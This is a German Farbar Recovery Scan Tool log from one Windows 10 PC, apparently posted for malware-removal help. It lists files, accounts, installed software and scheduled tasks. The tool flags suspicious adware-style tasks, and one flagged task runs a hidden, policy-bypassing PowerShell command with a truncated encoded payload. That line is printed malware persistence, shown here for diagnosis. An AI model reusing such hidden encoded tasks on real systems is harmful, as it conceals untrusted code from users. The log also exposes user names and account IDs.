2016-04-17 16:13 - 2015-07-10 13:04 - 00000000 ____D C:\WINDOWS\rescache
2016-04-16 20:48 - 2015-09-24 15:09 - 00000000 ____D C:\Users\Harun\AppData\Roaming\.minecraft
2016-04-16 18:30 - 2015-07-29 13:28 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-04-16 18:15 - 2015-09-23 16:25 - 00000000 ____D C:\Users\faruk
2016-04-16 18:15 - 2015-07-29 14:58 - 00000000 ____D C:\Users\aysec
2016-04-16 18:15 - 2015-07-29 13:24 - 00000000 ____D C:\Users\Harun
2016-04-16 18:13 - 2015-07-10 11:05 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2016-04-16 17:24 - 2016-02-03 10:50 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Audacity
2016-04-16 15:48 - 2015-07-10 12:55 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-04-16 12:41 - 2015-07-29 16:33 - 00000000 ____D C:\Users\Harun\AppData\Local\Spotify
2016-04-16 12:41 - 2015-07-29 16:32 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Spotify
2016-04-15 18:02 - 2015-08-14 19:28 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-04-15 18:00 - 2015-08-14 19:28 - 135176864 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-04-15 17:58 - 2016-02-13 20:36 - 00000000 ___HD C:\$WINDOWS.~BT
2016-04-15 16:59 - 2015-07-29 13:28 - 00000000 ____D C:\Users\Harun\AppData\Local\Packages
2016-04-14 01:45 - 2010-11-21 05:27 - 00453280 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2016-04-11 23:31 - 2016-03-08 16:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare
2016-04-11 23:28 - 2015-08-01 22:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-04-11 20:21 - 2016-02-27 14:24 - 00000000 ____D C:\Program Files (x86)\Minecraft
2016-04-11 20:21 - 2016-02-02 19:29 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Sony
2016-04-11 20:21 - 2015-07-30 19:07 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Skype
2016-04-11 20:21 - 2015-07-10 11:05 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-04-11 13:22 - 2015-10-22 16:22 - 00000000 ____D C:\Users\Harun\AppData\Local\AMD
2016-04-10 22:05 - 2015-08-01 19:13 - 00000000 ____D C:\Program Files (x86)\AMD
2016-04-10 22:05 - 2015-08-01 18:48 - 00000000 ____D C:\Program Files\AMD
2016-04-10 21:58 - 2015-07-10 14:20 - 00234560 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-04-10 21:56 - 2015-07-10 13:04 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2016-04-10 17:32 - 2015-07-30 15:07 - 00000000 ____D C:\ProgramData\TuneUp Software
2016-04-09 20:13 - 2015-09-29 16:26 - 00000000 ____D C:\Users\Harun\Desktop\Minecraft
2016-04-07 22:37 - 2015-07-29 15:43 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Battle.net
2016-04-07 22:37 - 2015-07-29 15:42 - 00000000 ____D C:\ProgramData\Battle.net
2016-04-06 20:32 - 2015-07-10 13:06 - 00829944 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-04-06 20:32 - 2015-07-10 13:06 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-04-05 09:45 - 2015-08-09 07:13 - 07466024 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9108.tmp
2016-04-05 09:45 - 2015-08-01 18:47 - 00162784 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET9CFC.tmp
2016-04-05 09:45 - 2015-08-01 18:47 - 00143600 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SETA81C.tmp
2016-04-05 09:44 - 2015-08-09 07:13 - 09618784 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET84BF.tmp
2016-04-05 09:44 - 2015-08-09 07:13 - 00130616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET9CDB.tmp
2016-04-05 09:44 - 2015-08-09 07:13 - 00112392 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SETA80A.tmp
2016-04-05 09:43 - 2015-08-09 07:13 - 00112392 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9C84.tmp
2016-04-05 09:43 - 2015-08-01 18:47 - 09675944 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9635.tmp
2016-04-05 09:43 - 2015-08-01 18:47 - 01265208 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9F16.tmp
2016-04-05 09:39 - 2015-08-01 18:47 - 00685584 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\SET9CC9.tmp
2016-04-05 09:38 - 2015-08-09 07:10 - 00451088 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\SET85B6.tmp
2016-04-05 09:38 - 2015-08-09 07:10 - 00151056 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SETA82E.tmp
2016-04-05 09:37 - 2015-08-09 07:10 - 01285136 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\SET8512.tmp
2016-04-05 09:37 - 2015-08-09 07:10 - 00953360 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\SET91F9.tmp
2016-04-05 09:35 - 2015-08-09 07:10 - 40135696 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\SETA7D7.tmp
2016-04-05 09:35 - 2015-08-09 07:10 - 21739024 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\SET9BA2.tmp
2016-04-05 09:27 - 2015-08-09 07:13 - 08929400 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET8401.tmp
2016-04-05 09:27 - 2015-08-09 07:13 - 08669624 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET91B6.tmp
2016-04-05 09:27 - 2015-08-01 18:47 - 11735800 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET906A.tmp
2016-04-05 09:27 - 2015-08-01 18:47 - 01539560 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET9D3E.tmp
2016-04-04 06:16 - 2015-08-09 07:13 - 00102616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll
2016-04-04 06:16 - 2015-08-01 18:47 - 00152568 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiuxp64.dll
2016-04-04 06:16 - 2015-08-01 18:47 - 00133528 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiuxpag.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 09526616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiumd6a.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 08843208 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiumd64.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 08585696 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiumdva.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 07392480 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiumdag.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 00120656 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiu9p64.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 00102616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiu9pag.dll
2016-04-04 06:15 - 2015-08-01 18:47 - 11625784 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atidxx64.dll
2016-04-04 06:15 - 2015-08-01 18:47 - 09583808 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atidxx32.dll
2016-04-04 06:15 - 2015-08-01 18:47 - 01517360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll
2016-04-04 06:15 - 2015-08-01 18:47 - 01245416 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll
2016-04-04 06:09 - 2015-08-01 18:47 - 26345472 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\atikmdag.sys
2016-04-04 05:23 - 2015-08-09 07:10 - 40126976 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\amdocl.dll
2016-04-04 05:15 - 2015-08-09 07:10 - 21730304 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\amdocl12cl.dll
2016-04-04 03:57 - 2015-08-09 07:10 - 00442368 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll
2016-04-04 03:33 - 2015-08-09 07:10 - 01276416 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll
2016-04-04 03:32 - 2015-08-09 07:10 - 00944640 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll
2016-04-04 03:32 - 2015-08-09 07:10 - 00142336 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll
2016-04-04 03:31 - 2015-08-01 18:47 - 00676864 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\atikmpag.sys
2016-04-02 17:01 - 2015-11-21 15:21 - 00000000 ___RD C:\Users\Harun\Desktop\NVU (YAVUZ)
2016-03-30 13:13 - 2015-08-01 22:54 - 00001983 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-03-30 11:10 - 2015-11-07 20:53 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2016-03-24 16:01 - 2015-07-30 19:07 - 00000000 ___RD C:\Program Files (x86)\Skype
2016-03-24 16:01 - 2015-07-30 19:07 - 00000000 ____D C:\ProgramData\Skype

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2016-03-30 20:14 - 2016-03-30 20:14 - 0000000 _____ () C:\Users\Harun\AppData\Roaming\dc.ogt
2016-01-12 18:41 - 2016-01-19 16:52 - 0000600 _____ () C:\Users\Harun\AppData\Roaming\winscp.rnd
2016-01-13 15:38 - 2016-01-19 16:53 - 0000600 _____ () C:\Users\Harun\AppData\Local\PUTTY.RND
2015-07-30 15:17 - 2015-07-30 15:17 - 0007605 _____ () C:\Users\Harun\AppData\Local\Resmon.ResmonCfg
2015-07-29 13:50 - 2015-07-29 13:50 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Einige Dateien in TEMP:
====================
C:\Users\aysec\AppData\Local\Temp\avgnt.exe
C:\Users\faruk\AppData\Local\Temp\avgnt.exe
C:\Users\Harun\AppData\Local\Temp\avgnt.exe
C:\Users\Harun\AppData\Local\Temp\libeay32.dll
C:\Users\Harun\AppData\Local\Temp\msvcr120.dll
C:\Users\Harun\AppData\Local\Temp\playstv_patch.exe
C:\Users\Harun\AppData\Local\Temp\radeon-crimson-16.3.2-minimalsetup.exe
C:\Users\Harun\AppData\Local\Temp\raptrpatch.exe
C:\Users\Harun\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2016-04-19 15:23

==================== Ende von FRST.txt ============================
Addition

Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:18-04-2016
durchgeführt von Harun (2016-04-19 18:01:06)
Gestartet von C:\Users\Harun\Downloads
Windows 10 Pro (X64) (2015-07-29 11:28:54)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-2630849102-760198568-3561441068-500 - Administrator - Disabled)
aysec (S-1-5-21-2630849102-760198568-3561441068-1004 - Limited - Enabled) => C:\Users\aysec
DefaultAccount (S-1-5-21-2630849102-760198568-3561441068-503 - Limited - Disabled)
faruk (S-1-5-21-2630849102-760198568-3561441068-1009 - Limited - Disabled) => C:\Users\faruk
Gast (S-1-5-21-2630849102-760198568-3561441068-501 - Limited - Disabled)
Harun (S-1-5-21-2630849102-760198568-3561441068-1000 - Administrator - Enabled) => C:\Users\Harun
HomeGroupUser$ (S-1-5-21-2630849102-760198568-3561441068-1002 - Limited - Enabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

ACP Application (Version: 2016.0403.2316.14 - Advanced Micro Devices, Inc.) Hidden
AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.4 - Advanced Micro Devices, Inc.)
Apple Application Support (32-Bit) (HKLM-x32\...\{FE5C2FAA-118D-4509-B51D-3F71CC9E1B3E}) (Version: 4.3 - Apple Inc.)
Apple Application Support (64-Bit) (HKLM\...\{2937FD88-C9D6-4B82-B539-37CD0A572F42}) (Version: 4.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2E4AF2A6-50EA-4260-9BA4-5E582D11879A}) (Version: 9.3.0.15 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
AVG PC TuneUp (HKLM-x32\...\AVG PC TuneUp) (Version: 16.32.2.3320 - AVG Technologies)
AVG PC TuneUp (x32 Version: 16.32.5 - AVG Technologies) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Battlefield 4™ (HKLM-x32\...\{ABADE36E-EC37-413B-8179-B432AD3FACE7}) (Version: 1.4.2.30944 - Electronic Arts)
Battlefield™ Hardline (HKLM-x32\...\{CB4AC3DA-8CC1-4516-86DA-4078B57DB229}) (Version: 1.1.0.5 - Electronic Arts)
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.7.1 - EA Digital Illusions CE AB)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Catalyst Control Center Next Localization BR (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0403.2360.41341 - Advanced Micro Devices, Inc.) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.16 - Piriform)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version:  - Valve)
FMW 1 (Version: 1.73.2 - AVG Technologies) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 49.0.2623.112 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
HP Support Solutions Framework (HKLM-x32\...\{B1AD4FFB-DD17-43EC-8C30-B9E71EAD9132}) (Version: 12.2.8.17 - Hewlett-Packard Company)
iTunes (HKLM\...\{A31C5565-90D9-4615-AE13-94D86C3836C7}) (Version: 12.3.3.17 - Apple Inc.)
Java 8 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218051F0}) (Version: 8.0.510 - Oracle Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Mozilla Firefox 41.0.2 (x86 de) (HKLM-x32\...\Mozilla Firefox 41.0.2 (x86 de)) (Version: 41.0.2 - Mozilla)
OpenOffice 4.1.1 (HKLM-x32\...\{ACD0FFF9-6B35-43C1-82DB-9FF6990E8602}) (Version: 4.11.9775 - Apache Software Foundation)
Origin (HKLM-x32\...\Origin) (Version: 9.5.12.2862 - Electronic Arts, Inc.)
PlaysTV (HKLM-x32\...\PlaysTV) (Version: 1.9.2-r111395-release - Plays.tv, LLC)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.994 - Even Balance, Inc.)
Raptr (HKLM-x32\...\Raptr) (Version: 5.1.2-r111396-release - Raptr, Inc)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.41.216.2011 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
Skype™ 7.21 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.21.100 - Skype Technologies S.A.)
Spotify (HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Spotify) (Version: 1.0.25.127.g58007b4c - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Unity Web Player (HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\UnityWebPlayer) (Version: 5.2.0f3 - Unity Technologies ApS)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
WinRAR 5.30 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)
World of Warcraft Public Test (HKLM-x32\...\World of Warcraft Public Test) (Version:  - Blizzard Entertainment)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-2630849102-760198568-3561441068-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Harun\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\FileCoAuth.exe (Microsoft Corporation)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {04C44956-D7CD-4939-8F45-2FF07606F6B9} - System32\Tasks\bvxvcxxvaf => C:\Users\Harun\AppData\Local\bvxvcxxvaf\bvxvcxxvaf.exe <==== ACHTUNG
Task: {113ED8FC-24C5-4F57-AF03-B5534E316C7D} - System32\Tasks\{0E0B0E47-0D04-0808-0E11-0D0B0479110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkAbgBnAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAkAHMAYwA7ACQAUAByAG8A (Der Dateneintrag hat 9596 mehr Zeichen). <==== ACHTUNG
Task: {114F0918-4CBC-4DF3-89CF-6EF208E7497C} - System32\Tasks\ffgogogoBrowserUpdateUA => C:\Program Files (x86)\ffgogogo Browser\bin\browserServer.exe
Task: {11AE36CB-2A03-4DDC-A890-64628F30C9EF} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {17A4B275-EE49-4865-B9C9-53C2BB6B071F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-03-07] (Hewlett-Packard)
Task: {2798CFEA-C567-4F10-8381-056656C30F47} - System32\Tasks\{851C45EB-4FE8-42FB-AFE6-FF991A964C5B} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&amp;ver=7.7.0.103&amp;LastError=-3
Task: {2CF52B04-7B08-4ACC-A970-6B3FD69FDC4A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-29] (Google Inc.)
Task: {377F221C-47EF-4C4D-93AC-708AC0ABB8B9} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {396A2551-0AB1-4FE9-BED9-F057CF29CB2B} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {48BCCA7F-E9A5-4128-8E37-AE55AEFECA8E} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {4F5C5854-312A-4A24-ABDF-3C644FC226F6} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {55B0D6D1-C72E-49EF-B7F0-5C87D9BFE997} - System32\Tasks\eAHPeNhIUJCheckTask => C:\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\bin\eAHPeNhIUJ_server.exe
Task: {5A0191B5-5F68-4856-A343-DE3E25F99E5C} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {5D51534D-F177-4E19-B56B-21112F1A3483} - System32\Tasks\ffgogogoBrowserUpdateCore => C:\Program Files (x86)\ffgogogo Browser\bin\browserServer.exe
Task: {6152FDF3-58E5-498E-9CF3-A9D7D429B80B} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-03-11] (Piriform Ltd)
Task: {671B6DA2-50FC-4121-874E-571D617F7B32} - System32\Tasks\eAHPeNhIUJBrowserUpdateCore => C:\Program Files (x86)\eAHPeNhIUJ\eAHPeNhIUJ\bin\eAHPeNhIUJ_server.exe
Task: {6EEAF9D3-CC5F-4E6C-AC88-9DE7780771E9} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {70BAF52C-C324-4265-94E7-6336FBE7590E} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-04-15] (Microsoft Corporation)
Task: {732820F9-0FDC-4FC9-963F-25C3A2BA94B2} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe [2016-03-29] (AVG Technologies CZ, s.r.o.)
Task: {7E44129D-761D-427B-8DC4-16D8E966F159} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {8D3866F9-766B-48DB-A578-5C21B7EA69AC} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {92C84F68-7305-4AC7-833F-BA67477E36CA} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {A0FF1C4C-B44D-432C-AFCB-8A38CAAB8ADC} - \Microsoft\Windows\File Classification Infrastructure\Property Definition Sync -> Keine Datei <==== ACHTUNG
